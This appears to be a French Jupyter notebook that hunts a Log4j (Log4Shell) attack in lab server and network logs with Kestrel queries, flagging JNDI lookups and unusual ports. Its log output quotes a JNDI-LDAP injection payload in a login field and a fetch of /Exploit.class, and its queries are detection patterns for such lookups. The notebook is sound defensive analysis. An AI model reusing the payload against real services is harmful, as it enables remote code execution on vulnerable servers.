# **Analyse de l'attaque Log4j avec Kestrel**
---

## *Détection en connaissant la vulnérabilité*

Nous allons essayer de retrouver des indicateurs de compromission de l'attaque log4j. Nous allons tenter de retouver dans les processus des éléments en lien avec jndi et certains protocol


In [5]:
processus_suspect = GET process FROM file://logs_serveur.json 
WHERE process_command LIKE '%jndi%' AND process_command LIKE '%ldap%'
OR process_command LIKE '%jndi%' AND process_command LIKE '%rmi%'
OR process_command LIKE '%jndi%' AND process_command LIKE '%dns%'

DISP processus_suspect ATTR id, timestamp, thread, process_command



id 
 timestamp 
 thread 
 process_command 
 
 
 
 
 process--19f21ffa-e74e-43b1-85da-1a97bbe05841 
 2025-03-30T17:58:26.447Z 
 http-apr-8080-exec-3 
 Start processing with input [uname=%24%7Bjndi%3Aldap%3A%2F%2Flocalhost%3A1389%2Fa%7D&password=] 
 
 
 process--5bc3b837-fa27-40b5-b971-bcfdce969b7d 
 2025-03-30T17:58:27.569Z 
 http-apr-8080-exec-3 
 loadClass(com.sun.jndi.url.ldap.ldapURLContextFactory, false) 
 
 
 
 Block Executed in 6 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 network-traffic* 
 process* 
 safe_ports* 
 
 
 
 
 traffic_suspect 
 process 
 2 
 2 
 0 
 0 
 0 
 
 
 *Number of related records cached.



## *Détection sans connaître la vulnérabilité*

Nous allons charger les ports qui osnt considérés comme sain depuis un CSV.

In [2]:
ports = LOAD ports.csv AS safe_ports 
ports_norml = SORT ports BY Port ASC
DISP ports_norml

Port,id
20,safe_ports--7483516e-0447-4039-9ca5-8b58ecf5617c
21,safe_ports--c34a9bd1-852d-4007-a575-d1708ec3b666
22,safe_ports--c59331a6-656f-4603-bf21-13faafd0dfd5
25,safe_ports--7b648789-5147-4fe4-89a5-3191cc2cc0f4
69,safe_ports--9fbb0783-8926-48f2-bf5f-5cf3a75fa93b
80,safe_ports--26e7b345-159d-4253-9032-63b9cbda6a07
110,safe_ports--88f92921-f824-4c0e-9c82-499d6c6258f0
139,safe_ports--89517302-efeb-48cb-91ac-eb313609260e
143,safe_ports--84200626-b8bf-42a4-af6c-a7c58752d076
443,safe_ports--fe9c0cd9-fe77-4d9b-afee-182d5cb8d7d5


## *Lisiting des ports anormaux utilisés*

Nous faisons la liste des ports utilisés qui ne sont aps dans la liste chargée précédemment. Nous les récupérons depuis les logs de trafic réseau.

In [ ]:
nbr_trf2 = GET network-traffic FROM file://logs_trafic.json WHERE timestamp >= '2025-03-30T17:58:26.447Z'
AND timestamp <= '2025-03-30T17:58:40.447Z'
AND src_port NOT IN ports_norml.Port
AND dst_port NOT IN ports_norml.Port
sorted_trf2 = SORT nbr_trf2 BY timestamp ASC
DISP sorted_trf2

In [3]:
ntw_traf = GET network-traffic FROM file://logs_reseau.json WHERE id LIKE '%'
AND src_port NOT IN ports_norml.Port
AND dst_port NOT IN ports_norml.Port
sorted_ntw_traf = SORT ntw_traf BY timestamp ASC
DISP sorted_ntw_traf ATTR src_port, dst_port

src_port 
 dst_port 
 
 
 
 
 54682 
 1389 
 
 
 1389 
 54682 
 
 
 37998 
 8000 
 
 
 8000 
 37998 
 
 
 41354 
 9001 
 
 
 9001 
 41354 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 network-traffic* 
 safe_ports* 
 
 
 
 
 ntw_traf 
 network-traffic 
 34 
 34 
 0 
 0 
 
 
 sorted_ntw_traf 
 network-traffic 
 34 
 34 
 0 
 0 
 
 
 *Number of related records cached.

Sauvegarde dans un csv des tracfics réseau supects.

In [ ]:
SAVE sorted_trf3 TO susport.csv

## *Détection des processus en lien avec les ports supects*

In [8]:
prcss_susp = GET process FROM file://logs_serveur.json WHERE process_command LIKE '%1389%'
OR process_command LIKE '%8000%'
OR process_command LIKE '%9001%'
DISP prcss_susp ATTR timestamp, thread, method, class, process_command

timestamp 
 thread 
 method 
 class 
 process_command 
 
 
 
 
 2025-03-30T17:58:26.447Z 
 http-apr-8080-exec-3 
 processParameters 
 org.apache.tomcat.util.http.Parameters 
 Start processing with input [uname=%24%7Bjndi%3Aldap%3A%2F%2Flocalhost%3A1389%2Fa%7D&password=] 
 
 
 2025-03-30T17:58:29.263Z 
 http-apr-8080-exec-3 
 writeRequests 
 sun.net.www.protocol.http.HttpURLConnection 
 sun.net.www.MessageHeader@4bf91fa77 pairs: {GET /Exploit.class HTTP/1.1: null}{Cache-Control: no-cache}{Pragma: no-cache}{User-Agent: Java/1.8.0_102}{Host: localhost:8000}{Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2}{Connection: keep-alive} 
 
 
 
 Block Executed in 2 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 network-traffic* 
 process* 
 safe_ports* 
 
 
 
 
 prcss_susp 
 process 
 2 
 2 
 0 
 0 
 0 
 
 
 *Number of related records cached.